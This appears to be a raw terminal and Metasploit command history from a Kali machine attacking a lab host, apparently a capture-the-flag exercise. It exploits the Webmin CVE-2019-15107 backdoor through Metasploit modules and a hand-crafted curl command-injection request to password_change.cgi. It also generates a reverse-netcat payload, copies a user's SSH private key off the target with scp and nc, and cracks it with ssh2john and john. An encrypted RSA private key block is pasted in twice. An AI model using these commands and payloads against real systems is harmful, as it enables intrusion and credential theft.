LP7A51okAXMy2UaXN76Fgd0YePBl16EbSpI9sevYVAkrbpRNyDY5ZClK17jpP9JcQXuDvkapVSrOe2qKN5iKv1x8smETxuVGLLBm7VFgxfiQ6ca+dkjnBXfF5nvbXFAkgGD6hcWwk2WVRSbxUgk8Q84xA9e8MTEn93gR7iEkXlHRKqaW1hthOyovueoxra
kbH5ExUodxl+6SFyfOda+PXE6fkhtRvS2bDbYwMbb0bentl4QLWWRSo590Ks67PGpCiUNXvIRAnFVubKWmwBl+5OcPJpQ83b7qdrIMpIrmMTMbwMNorIZAbJVCQjBZtIjaGJI9JZZKcmFMv8L7LYJ55AIR+56jKl44xy4mSP/JE= kali@attacker
ssh 172.18.1.5
cd /home/eve/.ssh
ls
scp * kali:10.1.135.83/home/kali/eve
exit
ssh root@172.18.1.5
cd ..
cd eve
mkdir eve
cd eve
scp root@172.18.1.5/home/eve/.ssh .
scp root@172.18.1.5/home/eve/.ssh/* .
scp 172.18.1.5/home/eve/ .
ls /home/eve
ls -la /home/eve
exit
ssh root@172.18.1.5
scp root@172.18.1.5/home/eve/.ssh/ids_rsa .
scp root@172.18.1.5:/home/eve/.ssh/* .
ls id_rsa
cat id_rsa
cat id_rsa.pub
ssh2john id_rsa > hash.txt
sudot apt install john-data
sudo apt install john-data
ssh2john id_rsa > hash.txt
cat hash.txt
tail /usr/share/john/password.lst
head /usr/share/john/password.lst
head -n 30 /usr/share/john/password.lst
john hash.txt
ls -la
cd /home/kali
ls -la
ls -la /usr/share/john
ls -la Downloads
ls -la Documents
ls -la
ls -la Desktop
ls -la .john
cd /kali
find / -name "rockyou.txt"
john --help
cd eve
john --wordlist /user/share/wordlist/rockyou.txt hash.txt
john --wordlist /user/share/wordlists/rockyou.txt hash.txt
john --wordlist /usr/share/wordlists/rockyou.txt hash.txt
../ssh2john.py id_rsa -> hash.txt
john --wordlist /usr/share/wordlists/rockyou.txt hash.txt
john --wordlist /usr/share/wordlists/rockyou.txt --format=SSH hash.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
head /usr/share/wordlists/rockyou.txt
../ssh2john.py id_rsa > hash.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
cat hash.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist /usr/share/wordlists/rockyou.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
ifconfig
nmap 10.1.135.83
nmap 172.18.1.5
nmap -A 172.18.1.5
ssh kali@172.18.1.5
search
search
search cve:2019
search cve:2019-15107
use exploit/linux/http/webmin_backdoor
show options
help
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
exploit
exit
msfconsole
ls
cat id_rsa
cat > id_rsa
cat id_rsa
python3 ssh2john.py id_rsa > hash
rm id_rsa
cat > id_rsa
python3 ssh2john.py id_rsa > hash
ping 172.18.1.5
nmap -A 172.18.1.5
search  CVE-2019-15107
use exploit/linux/http/webmin_backdoor  2019-08-10       excellent  Yes    Webmin pass
exit
msfconsole
use exploit/unix/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
exploit
set LHOST 172.18.1.5
exploit
set RHOST 10.1.135.83
exploit
set RHOST 172.18.1.5
set LHOST 10.1.135.83
exploit
session -u 1
sess -i 2
sessions -u 1
sessions -i 2
exit
exit -y
msfconsole
ls
cd ..
ls
cd ..
ls
cd home
ls
cd kali
ls
touch my_rsa.txt
nano my_rsa.txt
ls
ssh2john.py my_rsa.txt
.ssh2john.py my_rsa.txt
python ssh2john.py my_rsa.txt
nmap
nmap -v -A 172.18.1.5
nmap -v -A 172.18.1.5
nmap -v -A 172.18.1.5
nmap -v -A 172.18.1.5
ls
git clone https://github.com/jas502n/CVE-2019-15107.git
ls
cd CVE-2019-15107
ls
python CVE_2019_15107.py https://172.18.1.5:10000 cmd
vim exploit.sh
ls
ls
./exploit.sh
sudo ./exploit.sh
vim exploit.sh
metasploit
mfsconsole
sudo msfdb init
sudo msfdb init
sudo msfdb start
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
run
set LHOST 10.1.135.83
run
exit
msfconsole -q
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
run
exit
msfconsole -q
ls
cd ..
ls
rm CVE-2019-15107
rm -r CVE-2019-15107
ls
rm -rf CVE-2019-15107
ls
nmap localhost
nmap 172.18.1.5
wireshark
use exploit/linux/http/webmin_backdoor
set LHOST 10.1.135.83
run
set LHOST 10.1.135.83
set RHOST 172.18.1.5
run
exit
msfconsole -q
background
sessions -u 1
run
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
run
sessions -u 1
sessions -i 2
exit
ls
exit -y
msfconsole -q
ls
ls
cd 'shell)\nls
ls
ls
ls
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
run
sessions -u 1
sessions -i 2
run
exit
exit -y
msfconsole -q
ls
vim id_rsa
ls
cat id_rsa
ssh eve@10.1.17.4
python ssh2john.py id_rsa
python ssh2john.py id_rsa > private
ls
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=1000000-password-seclists.txt hash
john — wordlist=/usr/share/wordlists/rockyou.txt private
john --wordlist=/usr/share/wordlists/rockyou.txt private
john --wordlist=/usr/share/wordlists/rockyou.txt private
ssh eve@10.1.17.4
nmap
ping 172.18.1.5
searchsploit -h
man nmap
nmap -A 172.18.1.5
curl 172.18.1.5
curl 172.18.1.5:10000
curl 172.18.1.5:10000/http-robots.txt
curl 172.18.1.5:10000/http-robots.txt | grep falg
curl 172.18.1.5:10000/http-robots.txt | grep flag
man curl
curl 172.18.1.5:10000/http-robots.txt -v
searchsploit miniserv
searchsploit miniserv
searchsploit miniserv
nmap -A 172.18.1.5
searchsploit Webmin
searchsploit 2019-15107
searchsploit CVE=2019-15107
searchsploit CVE-2019-15107
exploit
searchsploit -h
msf
search Webmin
use exploit/linux/http/webmin_packageup_rce
172.18.1.5
help
check 172.18.1.5
check 172.18.1.5:10000
exit
msfconsole
search  CVE-2019-15107
use 0
check 172.18.1.5
use 172.18.1.5
use
help
run
run  CVE-2019-15107
run 172.18.1.5
set RHOSTS 172.18.1.5
run
run bash
run -p bash
run
ip link
ip addr
set LHOST 10.1.135.83
nmap -A
nmap -A 172.18.1.0/24
nmap -sn 172.18.1.0/24
ping 172.18.1.1
nmap A 172.18.1.1
run
ping 10.1.18.22
ping 72.2.19.65
nmap -A 72.2.19.65
nmap -Pn 72.2.19.65
ssh 72.2.19.65
ssh eve@72.2.19.65
ping 10.1.17.4
ping 100.22.5.8
ping 10.1.18.22
ping 82.2.195.254
ping 10.1.17.4
nmap -A 10.1.17.4
ls
cat ssh2john.py
python ssh2john.py -h
python ssh2john.py -h
ls
cat 10.1.135.83
mv 10.1.135.83 privkey
ls
python ssh2john.py privkey
vim ssh2john.py
ls
python ssh2john.py privkey > johnkey
cat johnkey
cat johnkey
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkweb2017-top10.txt
ls
john --wordlist=darkweb2017-top10.txt johnkey
ls
ls -a
cd .john
ls
cat john.log
cat john.log
cd ..
john johnkey
john johnkey
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
john --wordlist=rockyou.txt johnkey
ls
cat .john/*
john --wordlist=rockyou.txt --show johnkey
john  --show --wordlist=rockyou.txt johnkey
john  -show --wordlist=rockyou.txt johnkey
john --wordlist=rockyou.txt johnkey
john --show johnkey
john --wordlist=darkweb2017-top10.txt johnkey
john --show johnkey
man john
john --wordlist=rockyou.txt -show -single johnkey
john -wordlist=rockyou.txt -show -single johnkey
john -wordlist=rockyou.txt -show johnkey
john -wordlist=rockyou.txt johnkey
john --show johnkey
john -wordlist=rockyou.txt --show johnkey
john -wordlist=rockyou.txt johnkey
john -wordlist=rockyou.txt -single johnkey
john -wordlist=rockyou.txt --incremental johnkey
john -wordlist=rockyou.txt --incremental johnkey
john -wordlist=rockyou.txt --format=SSH johnkey
john -show
john -show johnkey
ls
cat johnkey
cat johnkey
john -wordlist=/usr/share/wordlists/rockyou.txt.gz johnkey
john -show  johnkey
john -single  johnkey
john -show  johnkey
john -incremental  johnkey
john -show -incremental  johnkey
cd .john
ls
cat *
ls
cat john.log
cat john.pot
cat john.rec
cat john.rec
htop
john -wordlist=/usr/share/wordlists/*
john -wordlist=/usr/share/wordlists/rockyou.txt
john -wordlist=/usr/share/wordlists/rockyou.txt
cd ..
john -wordlist=/usr/share/wordlists/rockyou.txt  johnkey
john -incremental  johnkey
john -show  johnkey
john -wordlist=/usr/share/wordlists/rockyou.txt  johnkey
john -wordlist=/usr/share/wordlists/rockyou.txt  johnkey
ping 172.18.1.5
nmap -h
nmap ist Scan - simply list targets to scan
nmap ist Scan - simply list targets to scan
nmap ist Scan - simply list targets to scan
nmap 172.18.1.5
nmap -sV 172.18.1.5
help
show targets
ls /exploits/
ls exploits/
use exploit/windows/
search cve:2020-35606
search webmin cve:2020 type:exploit
search webmin
use exploit/linux/http/webmin_packageup_rce
help
set RHOSTS 172.18.1.5
exploit
set USERNAME kali
set PASSWORD kali
exploit
set LHOST 10.1.135.83
exploit
exit
msfconsole
use  exploit/linux/http/webmin_backdoor
help
exploit
set RHOSTS 172.18.1.5
exploit
set LHOST 10.1.135.83
exploit
exploit
ls
vim id_rsa
exit
msfconsole
ls
nano id_rsa2
vim id_rsa3
vim id_rsa4
vim id_rsa4
cat id_rsa4
python ssh2john.py id_rsa4 > id_rsa.hash
ls
cat /usr/share/wordlists
ls /urs/share/wordlists/
ls /urs/share/wordlists
ls /usr/share/wordlists
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
nano id_rsa
ls
pwd
head ssh2john.py
cat ssh2john.py
ifconfig -a
nmap -sP 192.168.100.0/24
sudo nmap -sn 192.168.4.0/24
nmap -sV 192.168.4.0/24
ip config
nmap 172.18.1.5
ip addr
nmap -sV
nmap -sV
nmap -sV
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5 -p 10000
nmap -sV 172.18.1.5 -p 22
ls
cat ssh2john.py
ls
nmap -sV 172.18.1.5 -p 22
nmap -sV 172.18.1.5 -p 10000
search CVE-2019-15107
use exploit/linux/http/webmin_backdoor
ls
exploit
shiw info
show info
show option
show options
set parameter RHOSTS 172.18.1.5
set parameter LHOST 10.1.135.83
exploit
run
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
exploit
exit
msfconsole
nmap -sV 172.18.1.5 -p 10000
search webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
exploit
exit
msfconsole
vi id_rsa
ls
cd /usr/share/wordlists
ls
cd
ls
vi
vi id_rsa
vi
vi id_rsa
ls
cat id_rsa
rm id_rsa
vi id_rsa
cat id_rsa
python3 ssh2john.py id_rsa > hash
nmap -sL 172.18.1.5
nmap 172.18.1.5, 100-102
nmap 172.18.1.5, 100-102
nmap 172.18.1.5
nmap -p 10000 172.18.1.5
nmap -sC 172.18.1.5 -p 10000
msfconsole --help
msfconsole --help
msfconsole --help
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set LHOST use exploit/unix/webapp/webmin_backdoor 172.18.1.5
set LHOST 172.18.1.5
set LPORT 172.18.1.5
show options
set LPORT 10000
show options
show payloads
set payload payload/cmd/unix/bind_awk
run
show options
exit
msfconsole
use exploit/unix/webapp/webmin_backdoor
show options
set LHOST 172.18.1.5
set LPORT 10000
show options
run
exit
msfconsole
use exploit/unix/webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
run
exit
msfconsole
ls
nano key.txt
ls
python3 ssh2john.py key.txt > hash
ping 172.18.1.5
curl 172.18.1.5
curl 172.18.1.5
nmap 172.18.1.5
curl 172.18.1.5:10000
nmap --help
nmap -sV 172.18.1.5
nmap -sV -p 10000 172.18.1.5
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'
export URI=172.18.1.5:10000
echo $URI
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'
was linked to from an unknown URL, which appears to be outside the Webmin server.
was linked to from an unknown URL, which appears to be outside the Webmin server.
FLAG="f3a0c13c3765137bcde68572707ae5c0"
FLAG="f3a0c13c3765137bcde68572707ae5c0"
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'
msfvenom -p cmd/unix/reverse_netcat lhost=
msfvenom -p cmd/unix/reverse_netcat lhost=172.18.1.5 lport=4444
msfvenom -p cmd/unix/reverse_netcat lhost=172.18.1.5 lport=4444
curl -ks $URI'/password_change.cgi' \
curl -ks $URI'/password_change.cgi' \
curl -ks $URI'/password_change.cgi' \
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=ls /root/&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'
use exploit/unix/webapp/webmin_backdoor
exploit
run
--help
help
check 172.18.1.5
exploit 172.18.1.5
exploit -p ls 172.18.1.5
run 172.18.1.5
run -h 172.18.1.5
exploit 172.18.1.5
set RHOSTS 172.18.1.5
run 172.18.1.5
run
help
show options
set LHOST 172.18.1.5
exploit
run
set LHOST 10.1.135.83
ls -la
nano eve_id_rsa
nano eve_id_rsa
vim eve_id_rsa
background
msf6
msf > sessions -u 1
run
msf6 > sessions -u 1
msf > sessions -u 1
help
sessions -u 1
msf > sessions -u 1
ls -la
cd /kali
cd /kali/
cd /
ll
cd ~
ll
python ssh2john.py
python ssh2john.py id_rsa
python ssh2john.py id_rsa > translated.txt
john
john translated.txt
ll
john --wordlist=/usr/share/wordlists/rockyou.txt translated.txt
nmap 172.18.1.5
nmap ^[[200~
nmap 172.18.1.5
nmap 172.18.1.5/22
ssh 172.18.1.5
ssh 172.18.1.5/22
ssh 172.18.1.5:22
ssh 172.18.1.5:22/tcp
ssh 172.18.1.5/22/tcp
nmap -h
nmap 172.18.1.5/22
nmap 172.18.1.5/1000
ssh ignite@172.18.1.5
nmap -h
nmap -sv 172.18.1.5
nmap -sv 172.18.1.5 -p 22
nmap --help
nmap 172.18.1.5 -sv
nmap -v 172.18.1.5
nmap -sv 172.18.1.5:22
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
metaspoilt
ssh 172.18.1.5/10000
sudo apt install metasploit-framework
ls
cd Downloads
ls
ls
cd //
cd Documents
ls
cd home
cd home
msf
meta
metaspoilt
sudo
sudo install metaspoilt-framework
metaspoilt
sudo apt install metasploit-framework
apt install metasploit-framework
msfconsole
msfconsole -h
search webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
run
cd home
ssh 172.18.1.5:44112
ssh root@172.18.1.5:44112
exploit
ssh root@172.18.1.5:44112
tail /usr/share/john/password.lst
head -n 30 /usr/share/john/password.lst
ls
cat ssh2john.py
cd ..
ls
cd kali
ls
cd ..
ls
cd user
ls
ls
ls
python3 ssh2john.py
sis\s\s
s
ls
nmap
ipconfig
ping 172.18.1.5
nmap
nmap 172.18.1.5
nmap 172.18.1.5
nmap help -sV
nmap --help -sV
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5 -p 10000
nmap -sV 172.18.1.5 -p 10000
ls
vim ssh2john.py
ls
cd ..
ls
cd
-h
help
msf exploit(webmin_show_cgi_exec) > show options
exploit(webmin_show_cgi_exec) > show options
banner
exploit(webmin_show_cgi_exec) > show options
use exploit/unix/webapp/webmin_show_cgi_exec
show targets
show options
RHOST 172.18.1.5
RHOSTS 172.18.1.5
connect 172.18.1.5
show options
exit
msfconsole
msfcli exploit/unix/webapp/webmin_show_cgi_exec RHOST=172.18.1.5 RPORT=10000 LHOST=10.1.135.83
use exploit/unix/webapp/webmin_show_cgi_exec
RHOSTS=172.18.1.5
help
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
exploit
show options
exploit
exit
msfconsole
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
exploit
exit
msfconsole
nmap
use exploit/unix/webapp/webmin_backdoor
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
exploit
exit
msfconsole
ls
> ssh.txt
ls
vim ssh.txt
ipconfig
ping 172.18.1.5
ifconfig
ip 172.18.1.5 show
ip help
ping 172.18.5.1
ping
ping 172.18.1.5
ifconfig
ping 172.18.5.1
nmap
nmap -sn 172.18.1.5
nmap 172.18.1.5
nmap -p- 172.18.1.5
nmap p- 10000 172.18.1.5
nmap -p 10000 172.18.1.5
nmap -sV -O 172.18.1.5
nmap -sV 172.18.1.5
msf
metasploit
show
show exploits
clear
use exploit/linux/http/webmin_backdoor
exploit
run
vack
back
use exploit/linux/http/webmin_backdoor
show options
check
show targets
back
db_map -F 172.18.1.5
db_nmap -F 172.18.1.5
nmap -F 172.18.1.5
hosts
services
LHOST 172.18.1.5
RHOST 172.18.1.5
LHOSTS 172.18.1.5
search webmin
use exploit/linux/http/webmin_backdoor
options
set RHOSTS 172.18.1.5
show targets
set RPORT 10000
options
exploit
set LHOST 10.135.83
exploit
set LHOST 10.1.135.83
exploit
run
show targets
show options
run
search webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOSTS 172.18.1.5
set LHOST 10.1.125.83
exploit
show options
show options
set LHOST 10.1.135.83
exploit
show options
show advanced
exploit
search webmin
back
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
back
exploit
clear
exit
msfconsole
nmap
ifconfig
nmap -sn 10.1.135.83
nmap -sP 10.1.135.83
nmap -sP 100.100.100.63
nmap -sn 100.100.100.63
nmap -sn 100.100.100.63/24
nmap -sV 100.100.100.75
nmap -sn 10.1.135.83/24
nmap -sn 172.18.1.5
nmap -sn 172.18.1.5/24
nmap -sV 172.18.1.1
nc 172.18.1.5 4444 -w 3 < id_rsa
nc 172.18.1.5 4444 -w 3 < /root/home/eve/.ssh/id_rsa
nc 172.18.1.5 4444 -w 3 < /root/home/eve/.ssh/id_rsa
nc 172.18.1.5 4444 -w 3 < /root/home/eve/.ssh/id_rsa
nc 172.18.1.5 4444 -w 3 < /root/home/eve/.ssh/id_rsa
exploit
ping 172.18.5.1
search webmin
use exploit/linux/http/webmin_backdoor
set LHOST 10.1.135.83
set RHOST 172.18.1.5
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
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
clear
exploit
sessions -u 1
sessions -u 6
nano id_rsa
ls
sessions -i 7
nano ssh2john.py
python ssh2john.py id_rsa
nano id_rsa
rm id_rsa
ls -la
cd /
cd home
ls -la
cd kali
ls -la
meterpreter
sessions -i 7
sessions -u 6
sessions -i 7
sessions -i 8
exploit
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
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
